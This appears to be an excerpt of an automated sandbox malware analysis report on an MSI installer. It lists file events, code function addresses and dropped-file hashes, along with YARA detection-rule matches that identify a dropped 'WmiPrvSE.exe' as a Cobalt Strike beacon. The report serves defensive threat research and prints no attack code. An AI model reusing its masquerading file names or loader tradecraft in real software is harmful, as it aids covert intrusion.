Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EF7234CDBB1649702229F955C785C39F	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EF7234CDBB1649702229F955C785C39F	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49855FCDFA62840A2838AEF1EFAC3C9B	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49855FCDFA62840A2838AEF1EFAC3C9B	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI3FB2.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0009C060	4_2_0009C060
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0006A7B0	4_2_0006A7B0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0006B830	4_2_0006B830
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000D6377	4_2_000D6377
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000E83A9	4_2_000E83A9
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0006E5E0	4_2_0006E5E0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000BC5F0	4_2_000BC5F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000DE660	4_2_000DE660
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000D2720	4_2_000D2720
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0006E830	4_2_0006E830
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C6950	4_2_000C6950
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000616C0	4_2_000616C0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000B2C80	4_2_000B2C80
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C6D50	4_2_000C6D50
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0008CD60	4_2_0008CD60
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000B6E40	4_2_000B6E40
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C6EF0	4_2_000C6EF0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C0F80	4_2_000C0F80
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C50D0	4_2_000C50D0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C51F0	4_2_000C51F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C3230	4_2_000C3230
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C32D0	4_2_000C32D0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000E13E9	4_2_000E13E9
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000DF57D	4_2_000DF57D
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00065770	4_2_00065770
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000B1900	4_2_000B1900
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0008B990	4_2_0008B990
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0008BAA0	4_2_0008BAA0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000BDCB0	4_2_000BDCB0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00081D00	4_2_00081D00
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0008FD80	4_2_0008FD80
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000C7DB0	4_2_000C7DB0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000D5FE9	4_2_000D5FE9
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB244928	5_2_00007FF7BB244928
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB23F930	5_2_00007FF7BB23F930
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB251F20	5_2_00007FF7BB251F20
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB235E24	5_2_00007FF7BB235E24
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB25CE88	5_2_00007FF7BB25CE88
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB253484	5_2_00007FF7BB253484
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24A4AC	5_2_00007FF7BB24A4AC
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB25B190	5_2_00007FF7BB25B190
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB260754	5_2_00007FF7BB260754
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB268C1C	5_2_00007FF7BB268C1C
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24BB90	5_2_00007FF7BB24BB90
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB245B60	5_2_00007FF7BB245B60
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB254B98	5_2_00007FF7BB254B98
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB241A48	5_2_00007FF7BB241A48
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB26FA94	5_2_00007FF7BB26FA94
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB252AB0	5_2_00007FF7BB252AB0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB231AA4	5_2_00007FF7BB231AA4
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB275AF8	5_2_00007FF7BB275AF8
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24C96C	5_2_00007FF7BB24C96C
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB253964	5_2_00007FF7BB253964
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2689A0	5_2_00007FF7BB2689A0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB272080	5_2_00007FF7BB272080
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24AF18	5_2_00007FF7BB24AF18
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB252D58	5_2_00007FF7BB252D58
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB258DF4	5_2_00007FF7BB258DF4
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB260754	5_2_00007FF7BB260754
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2553F0	5_2_00007FF7BB2553F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB237288	5_2_00007FF7BB237288
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24126C	5_2_00007FF7BB24126C
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB23A310	5_2_00007FF7BB23A310
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB23C2F0	5_2_00007FF7BB23C2F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24F180	5_2_00007FF7BB24F180
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2521D0	5_2_00007FF7BB2521D0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB26C838	5_2_00007FF7BB26C838
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB234840	5_2_00007FF7BB234840
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2376C0	5_2_00007FF7BB2376C0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB272550	5_2_00007FF7BB272550
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB24B534	5_2_00007FF7BB24B534
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001C5914	23_2_001C5914
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001C1928	23_2_001C1928
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001A916C	23_2_001A916C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001C1264	23_2_001C1264
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CAAB0	23_2_001CAAB0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001B0334	23_2_001B0334
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001C0374	23_2_001C0374
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001C239C	23_2_001C239C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CC397	23_2_001CC397
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001BF5A8	23_2_001BF5A8
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CE600	23_2_001CE600
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001ACE3C	23_2_001ACE3C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001A9680	23_2_001A9680
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CC680	23_2_001CC680
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001B6F38	23_2_001B6F38
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CB7B0	23_2_001CB7B0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_001CCFF0	23_2_001CCFF0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007801A8	23_2_007801A8
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0076DA3C	23_2_0076DA3C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078F200	23_2_0078F200
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0076A280	23_2_0076A280
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078D280	23_2_0078D280
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00777B38	23_2_00777B38
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078DBF0	23_2_0078DBF0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078C3B0	23_2_0078C3B0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00769D6C	23_2_00769D6C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00782528	23_2_00782528
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00786514	23_2_00786514
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0077867C	23_2_0077867C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00781E64	23_2_00781E64
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078B6B0	23_2_0078B6B0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00780F74	23_2_00780F74
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00770F34	23_2_00770F34
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00782F9C	23_2_00782F9C
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0078CF97	23_2_0078CF97

Source: Joe Sandbox View	Dropped File: C:\Users\Public\WmiPrvSE.exe 298EADA4723177FAC953AFC963A4BFFA56D7DBBA3D1BEA340E53953E736BCA80
Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSI3FB2.tmp 39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: String function: 000654B0 appears 64 times
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: String function: 000CD560 appears 54 times
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: String function: 000651E0 appears 65 times
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: String function: 000638D0 appears 48 times
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: String function: 000CC49F appears 36 times

Source: 1eSOBjseu2.msi	Binary or memory string: OriginalFileNameaipackagechainer.exe vs 1eSOBjseu2.msi
Source: 1eSOBjseu2.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs 1eSOBjseu2.msi
Source: 1eSOBjseu2.msi	Binary or memory string: OriginalFilenamePrereq.dllF vs 1eSOBjseu2.msi

Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
